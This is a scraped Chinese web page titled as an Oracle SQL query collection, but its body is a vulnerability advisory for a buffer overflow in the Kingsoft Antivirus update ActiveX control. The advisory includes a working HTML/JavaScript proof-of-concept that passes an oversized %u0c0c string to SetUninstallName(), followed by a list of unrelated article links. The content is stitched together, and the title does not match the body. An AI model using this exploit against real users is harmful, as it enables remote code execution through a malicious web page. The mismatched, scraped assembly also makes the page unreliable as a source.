oracle常用经典SQL查询(转贴)
来源:互联网 发布:mixly可视化编程软件 编辑:程序博客网 时间:2024/05/16 00:48
Kingsoft Antivirus Online Update Module是一款反病毒在线升级模块。
Kingsoft Antivirus在线升级模块包含的ActiveX控件不正确处理用户提交的参数数据,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。
问题存在于C:/WINDOWS/system32/KingSoft/KOS/UpdateOcx2.dll控件对SetUninstallName()方法的处理中,构建超长字符串作为SetUninstallName()方法参数数据,并诱使用户访问恶意WEB页,可导致触发缓冲区溢出,可能以应用程序进程权限执行任意指令。
测试方法:
[警 告]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
-----------------------------------------------------------------------------------
<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target1'></object>
<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target2'></object>
<script>
var str1 = "";
while (str1.length < 914)
{ str1 += unescape("%u0c0c");
}
target1.SetUninstallName(str1);
</script>
----------------------------------------------------------------------------------- 建议:
目前没有解决方案提供:
http://en.kingsoft.com/
- oracle常用经典SQL查询(转贴)
- oracle常用经典SQL查询
- oracle常用经典SQL查询
- oracle常用经典SQL查询
- oracle常用经典SQL查询
- oracle常用经典sql查询
- oracle常用经典SQL查询
- oracle常用经典sql查询
- oracle常用经典SQL查询
- Oracle常用经典SQL查询
- oracle常用经典SQL查询
- oracle常用经典SQL查询
- oracle常用经典SQL查询
- oracle常用经典sql查询
- oracle常用经典sql查询
- Oracle常用经典SQL查询
- oracle常用经典SQL查询
- oracle常用经典SQL查询
- js半角全角互相转换
- [企业管理]深圳归来谈软件企业团队建设
- Supertype
- 对联广告代码效果大全
- 三、探索需求—项目启动会议
- oracle常用经典SQL查询(转贴)
- 好用的HttpRequest访问封装类
- Dojo图书的战争爆发了
- DOM处理XML文件
- 手动安装mysql服务
- 春游后感:2008公司集体野外拓展训练
- 使用SAX处理XML文档
- Linux命令集
- [DB2 学习记录]3. DB2 基本安全概念-身份验证